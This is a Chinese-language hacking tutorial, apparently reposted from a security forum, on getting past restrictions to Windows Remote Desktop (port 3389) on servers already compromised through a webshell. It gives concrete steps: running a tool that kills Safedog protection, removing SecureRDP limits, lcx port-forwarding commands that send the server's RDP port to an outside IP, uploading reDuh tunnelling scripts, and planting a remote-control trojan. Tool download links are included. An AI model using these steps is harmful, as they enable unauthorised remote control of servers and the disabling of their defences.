突破各种对3389连接的访问限制

在开了3389终端之后但是连接不上的可能情况:

(1).目标服务器是内网 终端端口是你开的话 99%需要端口转发  有时候如果服务器开了终端的话
很有可能映射了也不就需要转发
(2). 目标是外网 开了3389 但连接不上终端

以下是各种情况可能原因及突破办法

1.  突破安全狗限制连接终端:
突破安全狗限制连接服务器终端:执行杀安全狗的exe
http://pan.baidu.com/share/link?shareid=83016&uk=2754130026

2. 突破SecureRDP限制连接终端
科普:SecureRDP是一款国外的软件,可以用该软件限制远程桌面登录的计算机名、MAC、IP,指定的才能登陆服务器的远程桌面,否则一律拒绝,支持Windows2003服务器操作系统,以下是这款限制软件的突破方法:
执行目录

 
删除这个限制连接上去

3. lcx进行端口转发 (不是内网才可以转发 有时候外网的时候连接不上终端也尝试下转发出来连接 )
类型的工具还有 mylcx  hd
webshell里执行
lcx.exe -slave 117.21.173.97 51 127.0.0.1 3389
(其实aspx大马自带一个转发的功能和上面的这行命令意义一样
127.0.0.1     3389      117.21.173.97     51 )
意思是将本机的3389转发到  117.21.173.97的51端口上
自己的cmd里面执
lcx.exe -listen 51 12345
意思是监听本机51端口 转发到本机的12345端口
如果有数据过来了 就连接本机的12345端口是连接目标服务器的终端
mstsc    ————
127.0.0.1:12345
lcx自己补充完整的路径
117.21.173.97 你的外网ip
51            监听端口
127.0.0.1     不用变
3389          服务器的终端端口

lcx下载地址:http://pan.baidu.com/share/link?shareid=83028&uk=2754130026

4.  利用  reDuhServers  突破转发
分为控制端和服务端

将服务端上传网站目录 看目标站支持什么脚本  如果aspx的就上传aspx的脚本即可
记录http地址

本机(自己需要时外网)打开客服端
地址栏输入  http地址
127.0.0.1                      12345
3389

127.0.0.1不要动    12345 你等下连接的端口
3389 服务器的终端端口

点击start 开启 看到有数据交换了 就连接本机
12345端口即可
127.0.0.1:12345

服务端下载地址: http://pan.baidu.com/share/link?shareid=83025&uk=2754130026
控制端下载地址:http://pan.baidu.com/share/link?shareid=83020&uk=2754130026

之后装远控软件 进行远程图形化操作即可  转发的时候(91ri.org:因为这款软件走的是http通道所以可以穿墙 不过速度特别慢!) 速度是超级慢 所以才说5

5.利用远程控制突破终端连接限制:
利用自己取得的系统权限,运行一个远控小马   上线之后控制桌面
装远控

91ri.org:个人觉得最后一点最实际也最快 实在不行咱们来个马呗,如果木马的反弹连接都出不来 那只能走http了。以上内容适合渗透过程中遇到的3389无法访问的解决情况,如果您是服务器的管理员不会配置或者遇到3389远程连接配置的难题可以参考《解决远程桌面无法连接的问题-精华版》文章,文章内包含了几乎所有的远程桌面无法连接解决办法!

原文:https://forum.90sec.org/thread-4015-1-1.html

本文由网络安全攻防研究室(www.91ri.org)信息安全小组收集整理,转载请注明出处!